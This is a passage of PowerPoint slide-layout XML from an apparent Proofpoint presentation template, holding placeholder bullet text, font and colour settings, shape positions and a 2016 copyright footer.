              <a:tabLst/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="922338" indent="-228600">
              <a:tabLst/>
              <a:defRPr sz="1400"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1150938" indent="-228600">
              <a:tabLst/>
              <a:defRPr sz="2000"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First Level Body Text, Arial Regular, 20pt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second Level Bullet, Arial Regular, 18pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First Level Body Text, Arial Regular, 20pt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second Level Bullet, Arial Regular, 18pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3035273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896600" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Text Slide with Bullets, Arial 36pt.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1371600"/>
            <a:ext cx="5257800" cy="4351338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="465138" indent="-227013">
              <a:tabLst/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="693738" indent="-228600">
              <a:tabLst/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First Level Body Text, Arial Regular, 20pt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second Level Bullet, Arial Regular, 18pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First Level Body Text, Arial Regular, 20pt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second Level Bullet, Arial Regular, 18pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="1371600"/>
            <a:ext cx="5257800" cy="4351338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="465138" indent="-227013">
              <a:tabLst/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="693738" indent="-228600">
              <a:tabLst/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First Level Body Text, Arial Regular, 20pt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second Level Bullet, Arial Regular, 18pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second Level Bullet, Arial Regular, 18pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First Level Body Text, Arial Regular, 20pt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second Level Bullet, Arial Regular, 18pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>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2804284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Text Slide with Bullets, Arial 36pt.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1371600"/>
            <a:ext cx="5334000" cy="4351338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="465138" indent="-227013">
              <a:tabLst/>
              <a:defRPr sz="1800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="693738" indent="-228600">
              <a:tabLst/>
              <a:defRPr sz="1600" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First Level Body Text, Arial Regular, 20pt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second Level Bullet, Arial Regular, 18pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First Level Body Text, Arial Regular, 20pt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second Level Bullet, Arial Regular, 18pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First Level Body Text, Arial Regular, 20pt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second Level Bullet, Arial Regular, 18pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6223000" y="1371600"/>
            <a:ext cx="5334000" cy="4351338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2000"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="465138" indent="-227013">
              <a:tabLst/>
              <a:defRPr sz="1800"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="465138" indent="0">
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr sz="1600"/>
            </a:lvl3pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>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2482323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Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr userDrawn="1">
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1174812300"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6477000" y="2514600"/>
          <a:ext cx="3191741" cy="292763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2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1376515"/>
            <a:ext cx="10972800" cy="728046"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="65656A"/>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Text content goes here. Arial Regular, 20pt.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr userDrawn="1">
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251203117"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2286000" y="2514601"/>
          <a:ext cx="3191741" cy="29276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043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4126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609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Text Slide With Bullets, Arial Bold, 36pt.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1447800"/>
            <a:ext cx="10972800" cy="4678363"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First Level Body Text, Arial Regular, 20pt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second Level Bullet, Arial Regular, 18pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>First Level Body Text, Arial Regular, 20pt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Second Level Bullet, Arial Regular, 18pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Third Level Bullet, Arial Regular, 16pt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6431395"/>
            <a:ext cx="12192000" cy="438150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="51788D"/>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9EDD3"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Franklin Gothic Book"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10087881" y="6526645"/>
            <a:ext cx="189139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Times New Roman" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-228600" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2971800" indent="-228600" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3429000" indent="-228600" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"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fld id="{83C72E20-67BE-3E41-B86A-803AEB731488}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="F9EDD3"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="r" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                <a:lnSpc>
                  <a:spcPct val="100000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="F9EDD3"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="F9EDD3"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Open Sans" charset="0"/>
              </a:rPr>
              <a:t>© 2016 Proofpoint, Inc</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="F9EDD3"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Open Sans" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Open Sans" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 4" descr="proofpoint-rebranding-logo-blk.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7200" y="6507595"/>
            <a:ext cx="1447800" cy="27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polygonal-wireframe-3.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId15">
